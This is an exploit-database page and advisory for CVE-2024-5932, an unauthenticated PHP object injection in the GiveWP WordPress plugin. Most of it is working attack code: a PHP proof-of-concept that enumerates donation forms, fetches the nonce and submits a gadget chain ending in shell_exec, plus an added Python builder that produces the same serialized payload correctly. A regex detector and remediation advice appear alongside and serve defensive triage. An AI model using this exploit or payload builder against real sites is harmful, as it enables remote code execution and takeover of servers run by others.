| Title | Published | Views | Family |
|---|---|---|---|
| WordPress GiveWP Donation / Fundraising Platform 3.14.1 Code Execution Exploit | 29 Aug 2024 00:00 | – | zdt |
| Exploit for Deserialization of Untrusted Data in Givewp | 6 Jan 2026 19:05 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Givewp | 25 Aug 2024 11:51 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Givewp | 30 Sep 2024 17:33 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Givewp | 25 Aug 2024 11:51 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Givewp | 4 Nov 2025 19:04 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Givewp | 21 Aug 2024 09:51 | – | githubexploit |
| CVE-2024-5932 | 20 Aug 2024 04:34 | – | circl |
| WordPress plugin GiveWP security vulnerability | 20 Aug 2024 00:00 | – | cnnvd |
| CVE-2024-5932 | 20 Aug 2024 02:03 | – | cve |
=============================================================================================================================================
| # Title : GiveWP Donation 3.14.1 PHP Object Injection vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://givewp.com |
=============================================================================================================================================
POC :
[+] Dorking in Google or other search engines.
[+] Code Description: This PHP script is a proof-of-concept exploit for a PHP Object Injection vulnerability in the WordPress plugin GiveWP (CVE-2024-5932, all versions up to and including 3.14.1).
What the script does:
Sends POST requests to the WordPress admin-ajax.php endpoint using cURL.
Enumerates donation forms by calling the give_form_search AJAX action.
Selects a random form and retrieves its form hash (nonce) via give_donation_form_nonce.
Builds a malicious serialized PHP object that abuses an unsafe deserialization chain through GiveWP and its bundled dependencies (Stripe, Faker).
Injects the payload into the give_title donation parameter.
Triggers deserialization during donation processing (give_process_donation); the gadget chain ends in a call to shell_exec with an attacker-chosen command (whoami in the script).
Prints the server response, which may contain the command output if the target is vulnerable.
Impact:
Successful exploitation leads to remote code execution (RCE) on the vulnerable WordPress server.
The attack requires no authentication: the affected AJAX actions are served to unauthenticated visitors through admin-ajax.php.
(Related: https://packetstorm.news/files/id/180463/ ; related CVE number: CVE-2024-5932)
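The PoC payload below is a hand-written serialized string, and PHP keys protected properties with NUL bytes ("\0*\0name"), which is easy to get wrong by a byte. As an added example (not part of the original advisory and not GiveWP's or the author's code), the Python script below builds the same gadget chain with a small PHP serializer so the declared lengths and NUL markers come out right, and pairs it with a detection check that flags request parameters carrying a serialized PHP object, the kind of check one would put in a WAF rule or run over captured POST bodies during triage. The class names and property values are the ones from the PoC payload; the helper names, the regexes and the sample requests are this example's own constructions.

```python
"""Build the GiveWP gadget chain (CVE-2024-5932) with a real PHP serializer and
flag it in request parameters.  Added example, not the advisory's own code."""
import re
from dataclasses import dataclass, field
from urllib.parse import quote, unquote_plus

PUBLIC, PROTECTED, PRIVATE = "public", "protected", "private"


@dataclass
class PhpObject:
    cls: str
    props: list = field(default_factory=list)   # entries: (visibility, name, value)


def _prop_key(vis, name, cls):
    # PHP mangles non-public property names with NUL bytes.  These NULs are what a
    # single-quoted PHP literal ('\0') does NOT produce, so a hand-written payload
    # silently ends up with wrong string lengths.
    if vis == PROTECTED:
        return "\x00*\x00" + name
    if vis == PRIVATE:
        return "\x00" + cls + "\x00" + name
    return name


def php_serialize(value):
    """Minimal PHP serialize() for the value types the gadget chain needs."""
    if isinstance(value, bool):
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        return f's:{len(value.encode())}:"{value}";'      # length is in bytes
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f"a:{len(value)}:{{{body}}}"
    if isinstance(value, PhpObject):
        body = "".join(php_serialize(_prop_key(vis, name, value.cls)) + php_serialize(v)
                       for vis, name, v in value.props)
        return f'O:{len(value.cls)}:"{value.cls}":{len(value.props)}:{{{body}}}'
    raise TypeError(f"unsupported type {type(value).__name__}")


def build_givewp_chain(command):
    """Same chain as the PoC: StripeObject -> GiveInsertPaymentData -> Give ->
    Faker ValidGenerator (validator = shell_exec) -> SettingsRepository (address1 = command)."""
    settings = PhpObject("Give\\Onboarding\\SettingsRepository",
                         [(PROTECTED, "settings", {"address1": command})])
    generator = PhpObject("Give\\Vendors\\Faker\\ValidGenerator",
                          [(PROTECTED, "validator", "shell_exec"),
                           (PROTECTED, "generator", settings),
                           (PROTECTED, "maxRetries", 10)])
    give = PhpObject("Give", [(PROTECTED, "container", generator)])
    payment = PhpObject("Give\\PaymentGateways\\DataTransferObjects\\GiveInsertPaymentData",
                        [(PUBLIC, "userInfo", {"address": give})])
    return php_serialize(PhpObject("Stripe\\StripeObject",
                                   [(PROTECTED, "_values", {"foo": payment})]))


# Detection: a serialized object header, or a NUL-mangled property name, inside a parameter.
PHP_OBJECT = re.compile(r'O:\d+:"[^"]+":\d+:\{')
MANGLED_PROP = re.compile(r'\x00(?:\*|[A-Za-z_\\][\w\\]*)\x00')


def find_php_object_injection(params):
    """Return the names of request parameters that carry a serialized PHP object.
    Values are percent-decoded first so %00 / %5C-encoded payloads are caught too."""
    hits = []
    for name, raw in params.items():
        value = unquote_plus(raw)
        if PHP_OBJECT.search(value) or MANGLED_PROP.search(value):
            hits.append(name)
    return hits


# Constructed sample requests (not captured traffic): one carrying the chain, one benign,
# one with the chain percent-encoded as it would appear in a raw access log body.
SAMPLE_REQUEST = {
    "action": "give_process_donation",
    "give-form-id": "123",
    "give_first": "John",
    "give_title": build_givewp_chain("whoami"),
    "give-gateway": "offline",
}
BENIGN_REQUEST = {"action": "give_process_donation", "give_title": "Mr.", "give_first": "John"}
ENCODED_REQUEST = {"give_title": quote(build_givewp_chain("id"))}

if __name__ == "__main__":
    print(repr(build_givewp_chain("whoami")))
    print("flagged:", find_php_object_injection(SAMPLE_REQUEST),
          find_php_object_injection(BENIGN_REQUEST), find_php_object_injection(ENCODED_REQUEST))
```

The detector is a triage aid, not a fix: the durable remediation is to stop passing attacker-controlled strings to unserialize() at all, or at least to call it with allowed_classes set to false so no gadget class can be instantiated.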
[+] Set Target : the $target variable in poc.php
[+] Usage : php poc.php
[+] PayLoad :
<?php
// Exploit for the PHP Object Injection vulnerability in the GiveWP WordPress plugin (CVE-2024-5932)

// POST form-encoded data to $url and return the response body
function send_request($url, $data) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/x-www-form-urlencoded']);
    $response = curl_exec($ch);
    if ($response === false) {
        die("cURL error: " . curl_error($ch) . "\n");
    }
    curl_close($ch);
    return $response;
}

$target = "http://victim-site.com"; // replace with the target site URL

// Step 1: fetch the list of donation forms (unauthenticated AJAX action)
$form_list = send_request("$target/wp-admin/admin-ajax.php", "action=give_form_search");
$form_list = json_decode($form_list, true);
if (empty($form_list)) {
    die("Failed to fetch the form list.\n");
}

// Step 2: pick a random form
$selected_form = $form_list[array_rand($form_list)];
$form_id = $selected_form['id'];

// Step 3: fetch the form hash (nonce) that give_process_donation requires
$form_data = send_request("$target/wp-admin/admin-ajax.php", "action=give_donation_form_nonce&give_form_id=$form_id");
$form_data = json_decode($form_data, true);
if (!isset($form_data['data'])) {
    die("Failed to fetch the form data.\n");
}
$form_hash = $form_data['data'];

// Step 4: build the payload: a gadget chain that ends in shell_exec($cmd)
$cmd = 'whoami';
$payload = 'O:19:"Stripe\\StripeObject":1:{s:10:"\0*\0_values";a:1:{s:3:"foo";' .
    'O:62:"Give\\PaymentGateways\\DataTransferObjects\\GiveInsertPaymentData":1:{' .
    's:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\0*\0container";' .
    'O:33:"Give\\Vendors\\Faker\\ValidGenerator":3:{s:12:"\0*\0validator";' .
    's:10:"shell_exec";s:12:"\0*\0generator";' .
    'O:34:"Give\\Onboarding\\SettingsRepository":1:{' .
    's:11:"\0*\0settings";a:1:{s:8:"address1";s:' . strlen($cmd) . ':"' . $cmd . '";}}' .
    's:13:"\0*\0maxRetries";i:10;}}}}}}';
// Protected properties are serialized as "\0*\0name" with real NUL bytes. In a single-quoted
// PHP string '\0' stays a literal backslash and zero, so the declared lengths (s:10, s:12, ...)
// would not match and unserialize() would reject the payload; convert the markers to NUL bytes.
$payload = str_replace('\0', "\0", $payload);

// Step 5: submit a donation with the payload in give_title
$data = http_build_query([
    'give-form-id' => $form_id,
    'give-form-hash' => $form_hash,
    'give-price-id' => '0',
    'give-amount' => '$10.00',
    'give_first' => 'John',
    'give_last' => 'Doe',
    'give_email' => 'john.doe@example.com', // placeholder donor address; must pass e-mail validation
    'give_title' => $payload,
    'give-gateway' => 'offline',
    'action' => 'give_process_donation'
]);
$response = send_request("$target/wp-admin/admin-ajax.php", $data);
echo "Response: \n$response\n";
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================